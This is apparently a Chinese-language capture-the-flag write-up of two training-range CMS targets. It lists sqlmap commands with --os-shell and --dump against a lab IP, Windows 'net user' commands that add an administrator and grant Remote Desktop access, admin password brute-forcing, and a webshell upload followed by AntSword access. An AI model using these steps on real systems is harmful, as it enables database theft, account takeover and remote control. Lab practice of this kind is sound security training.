靶場cms
資訊搜集階段:
1.背景掃描
主要通過禦劍背景和7kbscan掃描,搜集了背景資訊頁面
2.指紋識别
前端頁面和背景頁面各種指紋資訊
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLhNjNhJDZ3cTZ1cTYhRjY4UTZlRTZxAzNkFTYxMTMxMzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
點選上面的網站發現url欄有明顯的傳參資料
3.sqlmap工具掃描
主要參數--os-shell 反彈cmdshell
其他正常參數--dbs --tables --columns 爆庫爆表爆字段 --dump 顯示列印
注意點:兩個ID傳參sortid無法注入,itemid才可以直接帶出資料(之後考慮多個參數測試)
之後就是各種周遊資料庫
擷取第一個flag:
sqlmap.py -u http://192.168.7.160/Down.asp?ItemID=26 --batch -D test_eims -T eims_flag -C FLAG --dump
之後利用osshell遠控cmd嘗試建立遠端管理使用者
此處需要windows正常指令如下
net user admin [email protected] /add :此處使用者名admin 密碼[email protected] /add添加使用者(已有使用者會當做更改使用者名比如administrator)
一些其他正常使用者管理指令:
net user 檢視所有使用者 net user test1 /active:yes (no)激活/禁用使用者
net user localgroup 檢視本地使用者組
net user test1 /passwordchg:yes(no)允許或者禁止使用者更改密碼
net user test1 檢視指定使用者資訊。
net user localgroup “Remote Desktop Users” test1 /add 将使用者加入遠端管理組
靶場後續flag根據以上管理指令更改了超級管理者administrator使用者密碼通過遠端桌面指令mstsc連接配接或者直接搜尋遠端遠端桌面連接配接登入桌面擷取
靶場2
1.先掃一波背景
擷取到背景頁面嘗試管理者root,admin,administrator回顯admin密碼錯誤其他使用者不存在
對admin抓包爆破攻擊位置為密碼,注意點:驗證碼不要作為攻擊點
擷取到管理者使用者密碼admin123登入背景發現檔案上傳點和flag2
嘗試各種馬上傳寫入檔案
通過蟻劍連接配接擷取shell和資料庫flag